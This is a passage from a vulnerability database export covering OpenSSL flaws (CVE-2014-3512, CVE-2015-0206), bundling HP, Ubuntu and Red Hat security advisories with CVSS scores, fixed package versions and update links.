"http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3505" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3512" }, { "db": "BID", "id": "69083" }, { "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-129" }, { "db": "NVD", "id": "CVE-2014-3512" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3512" }, { "db": "BID", "id": "69083" }, { "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-129" }, { "db": "NVD", "id": "CVE-2014-3512" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-13T00:00:00", "db": "VULMON", "id": "CVE-2014-3512" }, { "date": "2014-08-06T00:00:00", "db": "BID", "id": "69083" }, { "date": "2014-08-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "date": "2015-03-18T00:44:34", "db": "PACKETSTORM", "id": "130868" }, { "date": "2014-09-09T17:32:22", "db": "PACKETSTORM", "id": "128214" }, { "date": "2014-08-08T21:50:05", "db": "PACKETSTORM", "id": "127803" }, { "date": "2014-12-26T15:46:37", "db": "PACKETSTORM", "id": "129721" }, { "date": "2014-08-11T11:11:00", "db": "PACKETSTORM", "id": "127811" }, { "date": "2014-08-06T12:12:12", "db": "PACKETSTORM", "id": "169648" }, { "date": "2014-08-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-129" }, { "date": "2014-08-13T23:55:07.670000", "db": "NVD", "id": "CVE-2014-3512" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-29T00:00:00", "db": "VULMON", "id": "CVE-2014-3512" }, { "date": "2016-07-26T23:01:00", "db": "BID", "id": "69083" }, { "date": "2015-06-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-129" }, { "date": "2023-11-07T02:20:10.980000", "db": "NVD", "id": "CVE-2014-3512" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-129" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of SRP Implementation of crypto/srp/srp_lib.c Vulnerable to buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003817" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-129" } ], "trust": 0.6 } }
var-201501-0340
Vulnerability from variot
Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate records for the next epoch, leading to failure of replay detection. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to cause the memory exhaustion, resulting in denial-of-service conditions.
Softpaq: http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all- 4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all- 4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch applied, VMware cannot connect if security level is set to "Refuse insecure connections". Updating VMware to the latest package on ftp.hp.com will solve the problem. ============================================================================ Ubuntu Security Notice USN-2459-1 January 12, 2015
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. (CVE-2014-3571)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain handshakes. A remote attacker could possibly use this issue to downgrade to ECDH, removing forward secrecy from the ciphersuite. (CVE-2014-3572)
Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that OpenSSL incorrectly handled certain certificate fingerprints. A remote attacker could possibly use this issue to downgrade the security of the session to EXPORT_RSA. (CVE-2015-0204)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client authentication. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0205)
Chris Mueller discovered that OpenSSL incorrect handled memory when processing DTLS records. This issue only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0206)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: libssl1.0.0 1.0.1f-1ubuntu9.1
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.8
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.21
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.23
After a standard system update you need to reboot your computer to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04774019
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04774019 Version: 1
HPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-08-24 Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Matrix Operating Environment. The vulnerabilities could be exploited remotely resulting in unauthorized modification, unauthorized access, or unauthorized disclosure of information.
References:
CVE-2010-5107 CVE-2013-0248 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-1692 CVE-2014-3523 CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8142 CVE-2014-8275 CVE-2014-9427 CVE-2014-9652 CVE-2014-9653 CVE-2014-9705 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 CVE-2015-0207 CVE-2015-0208 CVE-2015-0209 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-0285 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0290 CVE-2015-0291 CVE-2015-0292 CVE-2015-0293 CVE-2015-1787 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-2134 CVE-2015-2139 CVE-2015-2140 CVE-2015-2301 CVE-2015-2331 CVE-2015-2348 CVE-2015-2787 CVE-2015-3113 CVE-2015-5122 CVE-2015-5123 CVE-2015-5402 CVE-2015-5403 CVE-2015-5404 CVE-2015-5405 CVE-2015-5427 CVE-2015-5428 CVE-2015-5429 CVE-2015-5430 CVE-2015-5431 CVE-2015-5432 CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0 HP System Management Homepage (SMH) prior to version 7.5.0 HP Version Control Agent (VCA) prior to version 7.5.0 HP Version Control Repository Manager (VCRM) prior to version 7.5.0 HP Insight Orchestration prior to version 7.5.0 HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins.
HP Matrix Operating Environment component HP Security Bulletin Number Security Bulletin Location
HP Systems Insight Manager (SIM) HPSBMU03394 HPSBMU03394 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH) HPSBMU03380 http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la ng=en-us&cc=
HP Version Control Agent (VCA) HPSBMU03397 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM) HPSBMU03396 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK HPSBMU03413 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04774021
HISTORY Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
References:
CVE-2014-0118 - Remote Denial of Service (DoS) CVE-2014-0226 - Remote Denial of Service (DoS) CVE-2014-0231 - Remote Denial of Service (DoS) CVE-2014-3523 - Remote Denial of Service (DoS) CVE-2014-3569 - Remote Denial of Service (DoS) CVE-2014-3570 - Remote Disclosure of Information CVE-2014-3571 - Remote Denial of Service (DoS) CVE-2014-3572 - Remote Disclosure of Information CVE-2014-8142 - Remote Code Execution CVE-2014-8275 - Unauthorized Modification CVE-2014-9427 - Remote Disclosure of Information CVE-2014-9652 - Remote Denial of Service (DoS) CVE-2014-9653 - Remote Denial of Service (DoS) CVE-2014-9705 - Remote Code Execution CVE-2015-0204 - Remote Disclosure of Information CVE-2015-0205 - Remote Unauthorized Access CVE-2015-0206 - Remote Denial of Service (DoS) CVE-2015-0207 - Remote Denial of Service (DoS) CVE-2015-0208 - Remote Denial of Service (DoS) CVE-2015-0209 - Remote Denial of Service (DoS) CVE-2015-0231 - Remote Denial of Service (DoS) CVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code CVE-2015-0273 - Remote Execution of Arbitrary Code CVE-2015-0285 - Remote Disclosure of Information CVE-2015-0286 - Remote Denial of Service (DoS) CVE-2015-0287 - Remote Denial of Service (DoS) CVE-2015-0288 - Remote Denial of Service (DoS) CVE-2015-0289 - Remote Denial of Service (DoS) CVE-2015-0290 - Remote Denial of Service (DoS) CVE-2015-0291 - Remote Denial of Service (DoS) CVE-2015-0292 - Remote Denial of Service (DoS) CVE-2015-0293 - Remote Denial of Service (DoS) CVE-2015-1787 - Remote Denial of Service (DoS) CVE-2015-2301 - Remote Execution of Arbitrary Code CVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code CVE-2015-2348 - Unauthorized Modification CVE-2015-2787 - Remote Execution of Arbitrary Code CVE-2015-2134 - Cross-site Request Forgery (CSRF) SSRT102109
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:0066-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html Issue date: 2015-01-20 Updated on: 2015-01-21 CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
A NULL pointer dereference flaw was found in the DTLS implementation of OpenSSL. A remote attacker could send a specially crafted DTLS message, which would cause an OpenSSL server to crash. (CVE-2014-3571)
A memory leak flaw was found in the way the dtls1_buffer_record() function of OpenSSL parsed certain DTLS messages. A remote attacker could send multiple specially crafted DTLS messages to exhaust all available memory of a DTLS server. (CVE-2015-0206)
It was found that OpenSSL's BigNumber Squaring implementation could produce incorrect results under certain special conditions. This flaw could possibly affect certain OpenSSL library functionality, such as RSA blinding. Note that this issue occurred rarely and with a low probability, and there is currently no known way of exploiting it. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a non-ephemeral key even when the ephemeral ECDH cipher suite was selected. A malicious server could make a TLS/SSL client using OpenSSL use a weaker key exchange method than the one requested by the user. (CVE-2014-3572)
It was discovered that OpenSSL would accept ephemeral RSA keys when using non-export RSA cipher suites. A malicious server could make a TLS/SSL client using OpenSSL use a weaker key exchange method. (CVE-2015-0204)
Multiple flaws were found in the way OpenSSL parsed X.509 certificates. An attacker could use these flaws to modify an X.509 certificate to produce a certificate with a different fingerprint without invalidating its signature, and possibly bypass fingerprint-based blacklisting in applications. (CVE-2014-8275)
It was found that an OpenSSL server would, under certain conditions, accept Diffie-Hellman client certificates without the use of a private key. An attacker could use a user's client certificate to authenticate as that user, without needing the private key. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to mitigate the above issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites 1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix 1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues 1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record 1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record 1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification 1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64: openssl-1.0.1e-30.el6_6.5.ppc.rpm openssl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x: openssl-1.0.1e-30.el6_6.5.s390.rpm openssl-1.0.1e-30.el6_6.5.s390x.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-devel-1.0.1e-30.el6_6.5.s390.rpm openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
